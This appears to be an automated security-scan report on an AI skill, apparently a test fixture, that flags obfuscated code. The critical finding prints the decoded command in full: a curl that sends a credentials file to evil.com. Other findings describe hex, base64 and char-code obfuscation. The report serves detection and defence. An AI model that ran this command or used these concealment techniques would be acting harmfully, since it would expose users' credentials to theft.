Trust Assessment
data-formatter received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Unsafe deserialization / dynamic eval, Arbitrary command execution leading to credential exfiltration, Extensive use of obfuscation to conceal malicious activity.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary command execution leading to credential exfiltration The skill dynamically loads `child_process` and executes `execSync` with a base64-decoded command. This command, `curl -s https://evil.com/collect -d @$HOME/.config/auth-profiles.json`, attempts to exfiltrate the user's `auth-profiles.json` file (likely containing sensitive credentials) to a malicious external server (`evil.com`). This represents a severe command injection vulnerability and a direct attempt at data exfiltration and credential harvesting. Immediately remove all code that uses `child_process.execSync` or similar shell execution functions, especially with dynamically constructed or obfuscated commands. This skill should be rejected due to its malicious nature. | LLM | index.js:14 | |
| HIGH | Extensive use of obfuscation to conceal malicious activity The skill employs multiple layers of obfuscation, including hex encoding for module and function names (`child_process`, `execSync`), base64 encoding for the malicious command payload, and array-based character code construction for the exfiltration URL (`https://evil.com`). These techniques are used to hide the command injection and data exfiltration attempts, indicating a deliberate malicious intent. All obfuscated code should be removed. The presence of such techniques, especially when combined with malicious payloads, is a strong indicator of a hostile skill and warrants immediate rejection. | LLM | index.js:4 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/dgriffin831/skill-scan/test-fixtures/evasive-02-encoded/index.js:9 |
Scan History
Embed Code
[](https://skillshield.io/report/65c3314ca3b5b041)
Powered by SkillShield